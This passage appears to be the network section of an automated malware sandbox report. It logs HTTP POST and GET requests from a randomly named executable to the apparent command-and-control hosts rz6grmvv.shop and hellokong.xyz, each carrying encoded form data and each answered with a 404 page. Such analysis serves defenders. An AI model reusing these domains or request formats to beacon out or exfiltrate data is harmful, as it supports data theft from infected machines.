                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.649742121.254.178.230806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:57:35.154019117 CEST629OUTPOST /wvam/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.rz6grmvv.shop
                                                      Origin: http://www.rz6grmvv.shop
                                                      Referer: http://www.rz6grmvv.shop/wvam/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 6b 72 6c 59 4a 55 71 64 59 53 39 4b 32 55 76 55 6f 4c 63 4c 68 59 66 77 73 63 74 64 31 34 6f 63 76 32 67 31 63 72 4c 61 2f 4f 75 64 77 2b 4e 37 54 58 51 33 31 51 42 70 52 54 67 53 34 47 6d 50 6f 6b 78 47 6a 45 33 56 39 55 67 43 4b 33 47 52 62 6a 55 38 42 4f 42 36 51 6c 6b 4c 31 64 76 30 36 74 47 6a 45 48 37 35 79 4a 39 69 73 61 65 56 54 4a 48 35 70 4b 39 64 34 62 62 62 42 43 72 6f 55 4a 6a 45 45 67 55 70 50 5a 36 61 49 37 52 67 4a 77 7a 6a 64 33 4f 47 46 30 6b 31 67 56 51 76 59 65 4b 30 69 4d 61 78 66 33 63 6b 64 68 42 39 4d 33 73 52 74 33 41 68 67 75 79 61 6d 50 41 75 2b 4e 50 50 48 66 36 73 7a 38 71 61 64 6f 44 75 45 4c 2f 63 37 5a 2f 67 44 6e 33 4d 75 75 6e 31 32 77 3d 3d
                                                      Data Ascii: OdjTHtuX=krlYJUqdYS9K2UvUoLcLhYfwsctd14ocv2g1crLa/Oudw+N7TXQ31QBpRTgS4GmPokxGjE3V9UgCK3GRbjU8BOB6QlkL1dv06tGjEH75yJ9isaeVTJH5pK9d4bbbBCroUJjEEgUpPZ6aI7RgJwzjd3OGF0k1gVQvYeK0iMaxf3ckdhB9M3sRt3AhguyamPAu+NPPHf6sz8qadoDuEL/c7Z/gDn3Muun12w==
                                                      Jul 3, 2024 17:57:36.117645025 CEST367INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:57:35 GMT
                                                      Server: Apache
                                                      Content-Length: 203
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.649743121.254.178.230806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:57:37.679713011 CEST1642OUTPOST /wvam/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.rz6grmvv.shop
                                                      Origin: http://www.rz6grmvv.shop
                                                      Referer: http://www.rz6grmvv.shop/wvam/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 6b 72 6c 59 4a 55 71 64 59 53 39 4b 32 55 76 55 6f 4c 63 4c 68 59 66 77 73 63 74 64 31 34 6f 63 76 32 67 31 63 72 4c 61 2f 4f 57 64 77 4d 46 37 55 45 6f 33 6e 67 42 70 65 44 67 54 34 47 6d 6f 6f 6b 70 43 6a 45 37 76 39 52 6b 43 4c 56 2b 52 53 79 55 38 4c 4f 42 36 62 46 6b 4f 37 39 75 75 36 74 32 6e 45 44 66 35 79 4a 39 69 73 66 61 56 58 63 7a 35 72 4b 39 43 2f 62 62 58 46 43 71 33 55 4a 72 55 45 67 41 35 50 6f 61 61 49 62 42 67 49 43 72 6a 56 33 4f 2b 41 30 6b 62 67 51 49 4f 59 66 6e 4e 69 4e 66 71 66 77 55 6b 65 67 73 63 55 47 6f 65 32 55 45 68 2f 65 69 73 75 4c 64 63 37 38 6a 74 4d 4d 32 76 2b 34 79 42 65 66 6e 75 45 72 43 64 37 2f 43 49 46 51 32 79 71 66 61 79 79 72 6d 36 71 32 63 43 76 63 69 4e 6a 44 44 56 68 5a 33 43 46 67 37 55 72 58 45 70 36 69 66 35 5a 48 6f 41 36 4b 70 69 73 6e 72 53 4d 50 49 6d 35 50 6e 72 55 79 30 68 36 44 67 36 34 62 74 5a 58 37 62 58 6c 6f 2b 5a 6c 5a 66 49 58 4b 59 46 2f 4a 31 55 75 47 71 41 2b 46 54 4a 57 69 66 39 49 2f 4a 63 6e 41 32 4e 62 [TRUNCATED]
                                                      Data Ascii: OdjTHtuX=krlYJUqdYS9K2UvUoLcLhYfwsctd14ocv2g1crLa/OWdwMF7UEo3ngBpeDgT4GmookpCjE7v9RkCLV+RSyU8LOB6bFkO79uu6t2nEDf5yJ9isfaVXcz5rK9C/bbXFCq3UJrUEgA5PoaaIbBgICrjV3O+A0kbgQIOYfnNiNfqfwUkegscUGoe2UEh/eisuLdc78jtMM2v+4yBefnuErCd7/CIFQ2yqfayyrm6q2cCvciNjDDVhZ3CFg7UrXEp6if5ZHoA6KpisnrSMPIm5PnrUy0h6Dg64btZX7bXlo+ZlZfIXKYF/J1UuGqA+FTJWif9I/JcnA2NbPz4Bv+Aa/kTZvw6Um6crSKvUux1/ytkdiGNM8T/7xjHrYpZYD9IwglmOr7upSnYEDuzj+dq3lim0EywskNwNM802vttFoYjZGPhPRMyBbbZcEi2gvHjvRo7RlcKvAeKC7/JlTUDdPO5SGRCGhf7vcF7QhQPQL/7T7/ffv2Z28OIEAvBL6Lk4gks/yo+p5tPD65IyYb9WhcfRpXjq8AKFTWWpc2k49FBwvAXtGSn05N9OR5LPg7Zdp/NqiXvYW355menURAk51T6UJzmiVSaDUYLnYQSmD1Pw5q9bSqydFpoW+hdJw9YGqOs49wAoJwchD3UJEiS4azbaaVvJfiAxiBakWetiQi5r+eylJe3YV8fDVtL7YzlmEGOInKQDAGdFoc1JXwe5rA6LuM6/81MZAPc3sg+rm2QLQrf8IMPJ3l6RKTUTcTIeMyCOeaigWwVkO8exoOz8rFTI6t7GEiMNGYeKwjG7DJ2wEwK8vNfsEt/RWLeUMCunX/TnAECLUBLtZi2+gitoVIeleRDVnXSPggHpqCa2dlSlRY1N5z2yujUN9/CkQkSPh/wsjdFheVmoItpA7WQOHJ4nXuheohSBwPIqMa4tR9g8QeUQL8Cd3mD8Z6PsU+s3uof4trSupX9Oz+PHmfH920Q6GjjZ7WBYVydWBqAzbXt8+x [TRUNCATED]
                                                      Jul 3, 2024 17:57:39.011392117 CEST367INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:57:37 GMT
                                                      Server: Apache
                                                      Content-Length: 203
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.649744121.254.178.230806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:57:40.212461948 CEST346OUTGET /wvam/?Y6vp=3PLd8j&OdjTHtuX=ppN4Kg7gaCRo+jf4iLEmna60kcJd+oo7/wZIRMT4+Man5OlGV28GmQNPMVld/mi8klF/kBnYjgc4RUC2chY7WuIAYm4xk+Ll6sKGI2rWgbxJmoqgO5rVx7RJwqzCMQvvfrLjQU4= HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.rz6grmvv.shop
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:57:41.145848989 CEST367INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:57:40 GMT
                                                      Server: Apache
                                                      Content-Length: 203
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.649745203.161.49.220806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:57:46.199600935 CEST605OUTPOST /oui5/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.hellokong.xyz
                                                      Origin: http://www.hellokong.xyz
                                                      Referer: http://www.hellokong.xyz/oui5/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 66 44 7a 73 4b 2f 58 4a 79 61 32 75 52 63 35 4d 6e 6d 63 6d 74 51 38 46 63 64 6e 7a 32 4f 75 62 6d 79 57 35 31 35 42 77 6f 65 41 51 6c 69 38 41 4d 61 74 31 39 4f 67 4d 76 72 4d 38 37 53 4b 62 65 55 64 6e 45 50 4e 73 2b 59 52 41 32 4e 65 53 70 43 52 57 55 58 55 41 42 53 69 6b 4b 5a 53 44 54 35 35 2b 4c 43 69 35 4c 77 6d 75 36 45 6b 49 4c 4f 7a 57 6d 79 4e 38 69 72 5a 53 73 6f 50 76 55 78 49 61 6d 33 61 50 42 7a 75 6a 55 58 6b 55 63 71 37 72 31 42 2b 78 54 61 6d 79 6e 56 38 73 48 6a 71 6d 6a 6a 6c 46 48 49 54 36 6f 51 4b 78 70 59 72 41 4e 4d 57 73 74 68 43 78 56 35 43 51 78 76 4b 4c 45 30 4a 70 33 7a 52 31
                                                      Data Ascii: OdjTHtuX=fDzsK/XJya2uRc5MnmcmtQ8Fcdnz2OubmyW515BwoeAQli8AMat19OgMvrM87SKbeUdnEPNs+YRA2NeSpCRWUXUABSikKZSDT55+LCi5Lwmu6EkILOzWmyN8irZSsoPvUxIam3aPBzujUXkUcq7r1B+xTamynV8sHjqmjjlFHIT6oQKxpYrANMWsthCxV5CQxvKLE0Jp3zR1
                                                      Jul 3, 2024 17:57:46.784719944 CEST533INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:57:46 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.649746203.161.49.220806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:57:48.736191034 CEST629OUTPOST /oui5/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.hellokong.xyz
                                                      Origin: http://www.hellokong.xyz
                                                      Referer: http://www.hellokong.xyz/oui5/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 66 44 7a 73 4b 2f 58 4a 79 61 32 75 51 38 4a 4d 67 47 67 6d 6c 51 39 33 41 4e 6e 7a 39 75 75 58 6d 79 4b 35 31 34 46 61 6f 71 73 51 69 41 6b 41 65 50 52 31 38 4f 67 4d 6c 4c 4d 6c 2f 53 4b 71 65 55 52 46 45 4f 78 73 2b 65 39 41 32 50 47 53 70 55 5a 56 57 48 55 43 4f 79 69 6d 48 35 53 44 54 35 35 2b 4c 44 54 6b 4c 7a 57 75 37 33 4d 49 5a 72 50 52 6f 53 4e 2f 30 37 5a 53 6f 6f 50 72 55 78 4a 50 6d 31 2b 70 42 32 69 6a 55 57 55 55 64 2f 48 6f 2f 42 2f 34 4f 71 6e 62 30 51 5a 62 65 79 37 38 38 31 77 6f 66 4a 61 51 74 6d 4c 72 31 72 72 6a 66 63 32 75 74 6a 61 44 56 5a 43 36 7a 76 79 4c 57 6a 46 4f 34 48 30 57 53 44 45 41 70 72 79 63 73 75 52 62 73 47 67 33 52 34 6a 69 61 67 3d 3d
                                                      Data Ascii: OdjTHtuX=fDzsK/XJya2uQ8JMgGgmlQ93ANnz9uuXmyK514FaoqsQiAkAePR18OgMlLMl/SKqeURFEOxs+e9A2PGSpUZVWHUCOyimH5SDT55+LDTkLzWu73MIZrPRoSN/07ZSooPrUxJPm1+pB2ijUWUUd/Ho/B/4Oqnb0QZbey7881wofJaQtmLr1rrjfc2utjaDVZC6zvyLWjFO4H0WSDEAprycsuRbsGg3R4jiag==
                                                      Jul 3, 2024 17:57:49.363711119 CEST533INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:57:49 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.649747203.161.49.220806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:57:51.282027960 CEST1642OUTPOST /oui5/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.hellokong.xyz
                                                      Origin: http://www.hellokong.xyz
                                                      Referer: http://www.hellokong.xyz/oui5/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 66 44 7a 73 4b 2f 58 4a 79 61 32 75 51 38 4a 4d 67 47 67 6d 6c 51 39 33 41 4e 6e 7a 39 75 75 58 6d 79 4b 35 31 34 46 61 6f 71 6b 51 6c 78 45 41 4d 38 35 31 75 65 67 4d 37 62 4d 34 2f 53 4b 33 65 55 4a 42 45 4f 39 47 2b 62 68 41 35 4d 4f 53 34 78 35 56 66 48 55 43 46 53 69 6e 4b 5a 53 57 54 36 42 36 4c 44 6a 6b 4c 7a 57 75 37 78 77 49 50 4f 7a 52 71 53 4e 38 69 72 5a 65 73 6f 50 50 55 78 42 66 6d 31 36 35 47 43 65 6a 55 32 45 55 65 4a 54 6f 38 68 2f 36 50 71 6e 44 30 51 64 45 65 79 6e 47 38 31 74 7a 66 4c 47 51 76 69 36 69 6f 49 6a 41 4a 61 69 6f 31 78 69 42 56 70 4b 30 78 63 32 41 65 43 64 47 34 6d 59 6e 53 6b 41 6e 6c 34 2f 45 75 59 68 43 6b 67 64 44 63 74 4b 37 4b 30 6c 2f 74 30 38 51 49 56 76 48 46 35 6e 46 6e 6a 6d 37 35 62 52 49 43 31 33 76 74 2f 68 72 65 44 48 65 4e 69 33 7a 61 2f 57 4e 4d 67 7a 41 54 65 4e 45 32 68 4f 79 68 76 4f 61 6f 5a 78 31 47 64 73 68 76 77 5a 61 63 4e 77 6c 44 77 41 64 74 47 4c 42 4f 51 79 74 57 73 69 2f 5a 66 39 41 62 6f 53 41 57 31 51 4d 4f [TRUNCATED]
                                                      Data Ascii: OdjTHtuX=fDzsK/XJya2uQ8JMgGgmlQ93ANnz9uuXmyK514FaoqkQlxEAM851uegM7bM4/SK3eUJBEO9G+bhA5MOS4x5VfHUCFSinKZSWT6B6LDjkLzWu7xwIPOzRqSN8irZesoPPUxBfm165GCejU2EUeJTo8h/6PqnD0QdEeynG81tzfLGQvi6ioIjAJaio1xiBVpK0xc2AeCdG4mYnSkAnl4/EuYhCkgdDctK7K0l/t08QIVvHF5nFnjm75bRIC13vt/hreDHeNi3za/WNMgzATeNE2hOyhvOaoZx1GdshvwZacNwlDwAdtGLBOQytWsi/Zf9AboSAW1QMOdtSrEK9sxt5ASVvjDcmP5rzz5NFGPhS68EykFgp0r9FcunPriiWK3edsumnM+gPbyYUN9Eevr89zbLWg2DUAkwD933LDx/q4rd/GCdqRwYF5JHEwFe1sSDXf5HsfipXWkJSeg8Eu06wJ49XDn/8fLq1K8VtqJf/L95WbkSwQzqXJHlmkf97Ei7+qDwKJtN2StA/UZcYEbyp92gWtacppU7bJZcxd+LHhI48wUmtybtGk0lXefICnaZxpPANDNy7QQTIFjPwjBgvsQy2FAAuPzEguIaS2pY0dI0eh4uU+3gMfcaITP1c8hAcrlscDkIuddLPV4u0d+/NPtMBidIoNWikx9dSGljCpKwtYIN9Gf50BDo+8OmvLBNNToOM+jCEez9AAc+6zCZ0U5GutXpqVjku7fA/lPliNoc0dWf5trz3nIWbi/xEQ0p5KU5eEvCs7noncoB/D/i8z1rKwGjHj8nLaJJDAnmHxjvDiutxCVFoNd9kRsqs42b5KQjl8rw0+PNPVlXXwz6EaHmgIhAeE0j8igLemBHFogIRcmzyyYrQwJAeWCD29Xc82kYX2qVLkboXklZsuQrcI0hikQ1JsKLfFuKyJgrzFqr4OilEk6mgx6B7PjMuIDt4K/228Kqaopmmdre3nPk2lnCzfpsLXZ43hCBbZzPI/aU [TRUNCATED]
                                                      Jul 3, 2024 17:57:51.896353006 CEST533INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:57:51 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.649748203.161.49.220806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
